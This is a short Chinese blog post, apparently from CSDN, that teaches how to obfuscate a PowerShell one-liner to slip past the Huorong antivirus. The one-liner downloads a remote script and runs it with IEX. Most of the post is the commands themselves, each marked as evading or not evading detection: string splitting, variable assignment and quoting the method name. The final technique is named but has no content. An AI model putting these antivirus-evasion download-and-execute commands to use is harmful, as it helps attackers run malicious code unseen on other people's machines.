基础混淆
原始语句(不免杀)
powershell “IEX (New-Object System.Net.WebClient).DownloadString(‘http://127.0.0.1/a.ps1’)”
AV:火绒
混淆测试
New-Object System.Net 类可以直接替换成 New-Object Net 类(不免杀)
powershell "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/a.ps1')"
对于 DownloadString 函数中的 URL 字符串可以采用直接拼接的方式进行组合和拆分(不免杀)
powershll "IEX (New-Object Net.WebClient).DownloadString('ht'+'tp://127.0.0.1/a.ps1')"
定义一个变量,其值赋为New-Object(免杀)
powershell "$w=(New-Object Net.WebClient);IEX $w.DownloadString('ht'+'tp://127.0.0.1/a.ps1')"
用字符串DownloadString替换 DownloadString()函数(免杀)
powershell "IEX (New-Object Net.WebClient).('DownloadString')('h'+'ttp://127.0.0.1/a.ps1')"
使用 Invoke 调用方法(免杀)
版权声明:本文为weixin_43899495原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。